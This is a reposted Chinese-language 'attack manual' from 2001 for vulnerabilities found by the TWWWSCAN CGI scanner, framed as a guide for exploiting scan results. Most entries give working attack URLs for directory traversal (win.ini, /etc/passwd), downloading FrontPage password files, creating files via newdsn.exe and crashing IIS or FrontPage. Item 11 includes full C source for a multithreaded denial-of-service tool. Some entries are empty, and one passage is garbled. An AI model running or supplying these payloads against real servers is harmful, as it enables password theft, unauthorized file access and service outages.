![[ 永遠的UNIX::UNIX技術資料的寶庫 ]](/images/title.gif) GB | BIG5
|
| 首頁 > 安全技術 > 工具 > 正文 |
 |
| TWWWSCAN漏洞掃描器CGI漏洞攻擊手冊 |
| http://www.fanqiang.com (2001-05-19 09:05:32) |
/####################尊重作者權益,轉載時請保留此信息##########################/
/*TWWWSCAN漏洞掃描器CGI漏洞攻擊手冊*/
/*作者:無用君*/
/*E-MAIL: admin@root.com.cn */
/*Twwwscan是我用過最好的CGI漏洞掃描器之一,很多朋友也非常喜歡它。但最大的問題就是掃描出來的漏洞不知道要如何利用,所以我在網絡上找到了twwwscan所有能掃描的漏洞的資料和攻擊方法。希望對大家有所幫助。*/
/*歡迎光臨網絡技術 http://sadan.yeah.net */
/*歡迎光臨網絡安全技術交流場所“網絡論壇” http://www.s8s8.net */
/*歡迎光臨我的個人站: http://go5.163.com/~wyjoffice/ */
/#############################################################################/
____________________________________________________________________________________
1.carbo.dll
iCat Carbo服務器一個網絡購物程序,它被 PC雜評為最好的網絡購物軟件.安全專家Mikael Johansson發現 iCat Carbo服務器版本 3.0.0.中存在一個漏洞,這個漏洞讓我們每個人查看系統中的任何文件在(除文件之外和一些特殊字符).
攻擊方法:
提交這樣的http請求 :
http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog
http會做如下回應:
[iCat Carbo Server (ISAPI, Release) Version 3.0.0 Release Build 244]
Error: (-1007) cannot open file 'C:\web\carbohome\file_to_view.htm'
查看win.ini文件: c:\winnt\win.ini:
http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog
____________________________________________________________________________________
2.uploader.exe
如果您使用NT作為您的WebServer的操作系統,入侵者能夠利用uploader.exe上傳任何文件。
攻擊方法: http://host/cgi-win/uploader.exe
會帶你到上傳頁面,剩下的事就不用我告訴你了把?:)
____________________________________________________________________________________
3.search97.vts
這個文件將能使入侵者任意的讀取你系統中啟動httpd用戶能讀取的文件。
攻擊方法: http://www.xxx.com/search97.vts
?HLNavigate=On&querytext=dcm
&ServerKey=Primary
&ResultTemplate=../../../../../../../etc/passwd
&ResultStyle=simple
&ResultCount=20
&collection=books
____________________________________________________________________________________
4.newdsn.exe
個存在/scripts/tools目錄下的newdsn.exe文件允許任何一個用戶在web根目錄下創建任何文件。另外,在某些特定條件下,利用newdsn.exe可能使IIS遭受拒絕服務攻擊,如果攻擊成功,將導致IIS停止響應連接請求。
攻擊方法:
1. 創建文件:http://xxx.xxx.xxx.xxx/scripts/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Evil2+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2Fevil2.htm&newdb=CREATE_DB&attr=
2. D.o.s攻擊:提交下列連接請求:
http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase
如果IIS是有問題的版本,瀏覽器將不會顯示任何信息。當下列兩種情況中的任意一種發生時,都會導致拒絕服務:
- 重新啟動WWW服務時: 這將導致IIS掛起。不能重新啟動WWW服務,總是顯示"端口已經被佔用"的錯誤信息。
- 停止WWW服務: IIS將會停止 。但是IIS的數據庫部分並沒有死掉,仍然會響應80端口發來的請求,因此,如果再次提交一個請求: http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase
IIS會產生保護性錯誤。
____________________________________________________________________________________
5.getdrvs.exe
____________________________________________________________________________________
6. _vti_inf.html
____________________________________________________________________________________
7. service.pwd http://www.hostname.com/_vti_pvt/service.pwd可讀,將暴露用戶密碼信息.
攻擊方法:
訪問http://host/_vti_pvt/service.pwd [service.pwd]正是所需要的密碼文件,如果我們粗心的網管沒有設置權限的話,那瀏覽器就會顯示出對方的密碼文件。
____________________________________________________________________________________
8.users.pwd
UNix系統的http://www.hostname.com/_vti_pvt/users.pwd可讀,將暴露用戶密碼信息。
攻擊方法:
訪問http://www.hostname.com/_vti_pvt/users.pwd。
____________________________________________________________________________________
9.authors.pwd
UNix系統的http://www.hostname.com/_vti_pvt/authors.pwd可讀,將暴露用戶密碼信息。
攻擊方法:
訪問http://www.hostname.com/_vti_pvt/authors.pwd。
____________________________________________________________________________________
10.administrators.pwd
UNix系統的http://www.hostname.com/_vti_pvt/administrators.pwd可讀,將暴露用戶密碼信息。
攻擊方法:
訪問http://www.hostname.com/_vti_pvt/administrators.pwd。
____________________________________________________________________________________
11.shtml.dll
在Frontpage Extention Server/Windows2000 Server上輸入一個不存在的文件將可以得到web目錄的本地路徑信息. 但是如果我們請求並非HTML、SHTML或者ASP綴的文件,我們將會得到不同的信息. Hostile Code Here">http://TrustedServer如果用戶點擊上述指定的鏈接,腳本將通過HTTP請求從客戶端傳送給可信任的站點,可信任站點然將該腳本作為錯誤信息的一部分返回給客戶端。客戶端在收到包含該腳本的出錯頁面時,將執行該腳本,並將賦予來自可信任站點的內容的所有權力賦予該腳本。另外,shtml.dll對較長的帶html綴的文件名都會進行識別和處理,利用這一點,可以對IIS服務器執行DOS攻擊,以下這個程序,能使目標服務器的CPU佔用率達到 100%,並且耗用所有的應用程序日志空間。系統在數分鐘內會報告應用程序日志已滿。
攻擊方法:
1. 暴露路徑:http://www.victim.com/_vti_bin/shtml.dll/something.html
這樣將返回以下信息:
Cannot open "d:\inetpub\wwwroot\postinfo1.html": no such file or folder.
2. 可信任站點執行腳本:使用如下格式的URL: http://iis5server/_vti_bin/shtml.dll/
3. D.o.s攻擊:使用下面的程序可以能使目標服務器的CPU佔用率達到 100%,並且耗用所有的應用程序日志空間。
#include
#include
#include
#include
#include
void Dos(void *chara);
void main(int argc,char *argv[])
{
WORD wVersionRequested;
WSADATA wsaData;
int err;
long lDo ;
if (argc < 2)
{
printf("Usage: %s IP\n",argv[0]);
exit(1);
return ;
}
wVersionRequested = MAKEWORD( 2, 2 );
err = WSAStartup( wVersionRequested, &wsaData );
if ( err != 0 )
{
return;
}
if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 2 )
{
WSACleanup( );
return;
}
printf("wait ...\n");
for (lDo = 0 ;lDo < 1000;lDo++)
{
//printf("1\n");
_beginthread(Dos, 0, (void*)argv[1]);
}
Sleep( 1000000L );
}
void Dos(void *chara)
{
long lLen;
long lDo ;
char *ip ;
char buffer[2000];
struct sockaddr_in serv_addr;
SOCKET sockfd ;
char plusvuln[]="GET /_vti_bin/shtml.dll/";
ip= (char*)chara;
memset(buffer,'\0',2000);
serv_addr.sin_family =AF_INET;
serv_addr.sin_addr.s_addr = inet_addr("192.168.0.131");
serv_addr.sin_port = htons(80);
if ((sockfd =socket(AF_INET,SOCK_STREAM,0))<0)
{
printf("Create Socket faild \n");
return ;
}
if (connect(sockfd,(struct sockaddr*)&serv_addr,sizeof(serv_addr))<0)
{
printf("Connect faild \n");;
}
else
{
lLen = send ( sockfd,plusvuln,strlen(plusvuln),0 );
for (lDo = 0 ;lDo < 7000;lDo ++)
{
lLen = send ( sockfd,"postinfdddddddddd",strlen("postinfdddddddddd"),0) ;
if (lLen < 0 )
{
printf("Send faild \n");
return;
}
}
lLen = send ( sockfd,"tzl.html HTTP/1.0\n\n",strlen("tzl.html HTTP/1.0\n\n") + 1,0) ;
//recv(sockfd,buffer,2000,0);
//printf(buffer);
//printf("\n");
}
closesocket(sockfd);
}
____________________________________________________________________________________
12.shtml.exe
微軟的 FrontPage Server Extensions存在一個遠程拒絕服務漏洞,可能遠程關閉一個web站點上的所有FrontPage操作。通過提交一個包含DOS設備名的鏈接, FrontPage Server Extensions就會掛起,不再響應續的請求。為了恢復正常工作,必須重新啟動IIS或者重新啟動機器。
攻擊方法:
提交這樣的鏈接,都可能使FrontPage Server Extensions停止響應: http://www.example.com/_vti_bin/shtml.exe/com1.htm http://www.example.com/_vti_bin/shtml.exe/prn.htm http://www.example.com/_vti_bin/shtml.exe/aux.htm http://www.example.com/_vti_bin/shtml.exe/prn.anything.here.htm http://www.example.com/_vti_bin/shtml.exe/com1.asp http://www.example.com/_vti_bin/shtml.exe/com1.
____________________________________________________________________________________
13.queryhit.htm
如果queryhit.htm提出一個搜索頁面,那你便可以搜索和觀看這些文件。
攻擊方法:
訪問http://www.victim.com/samples/search/queryhit.htm 如果是搜索頁面,然在查找文件對話框裡輸入以下字符串:[#filename=*.pwd],如果屏幕上出現一長串連接到以[.pwd]為擴展名的密碼文件的話,那就是所需要的東東了。
____________________________________________________________________________________
14.Dotdotdot
vqServer及Sybase PowerDynamo網站服務器存在著一個老的攻擊漏洞,此攻擊是關點點(..)的攻擊,這是由在WINDOW中允許連續的點被解釋為級連的目錄如'cd ...',解釋為'cd ..\..'.而Sybase PowerDynamo,老版本的vqServer允許遠程攻擊者繞過WEB安全系統橫貫到其他目錄。
攻擊方法:
假如CONFIG.SYS存在在根目錄下,就能讀文件。 http://example.com/...................../config.sys
列出根目錄。 http://example.com/../../../../../../
____________________________________________________________________________________
15.advsearch.asp
____________________________________________________________________________________
16. autoexec.bat
現在很多web服務器上存在這個安全問題,例如Jana Webserver,URL Live 1.0 webserver等.惡意的用戶可能利用該漏洞來退出HTTP root目錄,從而到達上層的目錄樹中.在URL中使用"../",攻擊者們可以獲得WEB SERVER有權讀取的任何文件.
攻擊方法: http://127.0.0.1:8080/../../../autoexec.bat 這樣將讀取系統中的autoexec.bat文件
這個漏洞的利用還取決系統目錄的結構而定.
____________________________________________________________________________________
17.achg.htr aexp.htr aexp2.htr aexp2b.htr aexp3.htr aexp4.htr aexp4b.htr anot.htr anot3.htr
IIS4.0中包含一個有趣的特征就是允許遠程用戶攻擊WEB服務器上的用戶帳號,就是你的WEB服務器是通過NAT來轉換地址的,還可以被攻擊。每個IIS4.0安裝的時候建立一個虛擬目錄/iisadmpwd,這個目錄包含多個.htr文件,匿名用戶允許訪問這些文件,這些文件剛好沒有規定只限制在loopback addr(127.0.0.1),請求這些文件就跳出對話框讓你通過WEB來修改用戶的帳號和密碼。這個目錄物理映射在下面的目錄下:
c:\winnt\system32\inetsrv\iisadmpwd
攻擊方法:
訪問:http://example.com/iisadmpwd/*.htr的頁面,並利用工具對其進行窮舉。
____________________________________________________________________________________
18.visadmin.exe
這個漏洞可以在服務器中一直產生臨時文件知道服務器的硬盤慢了為止。任何人都可以遠程的來完成。
使用使用在cgi-bin中默認的 visadmin.exe (Visitor Administrator)
攻擊方法:
提交以下請求: http://www.targets.com/cgi-bin/visadmin.exe?user=guest
____________________________________________________________________________________
19.no-such-file.pl
這個漏洞會暴露其服務器上的路徑,當你訪問這個頁面時會顯示類似以下信息:
CGI Error
The specified CGI application misbehaved by not returning a complete set of
HTTP headers. The headers it did return are:
Can't open perl script "C:\InetPub\scripts\no-such-file.pl": No such file or
Directory
從此我們可以知道這個頁面的物理路徑為C:\InetPub\scripts\no-such-file.pl
攻擊方法:
訪問http://www.targets.com/cgi-bin/scripts/no-such-file.pl
(http://www.fanqiang.com)
進入【UNIX論壇】
|
|
| 相關文章 |
TWWWSCAN漏洞掃描器CGI漏洞攻擊手冊 (2001-05-19 09:05:32)
|
|
|
|
|
★ 樊強制作 歡迎分享 ★ |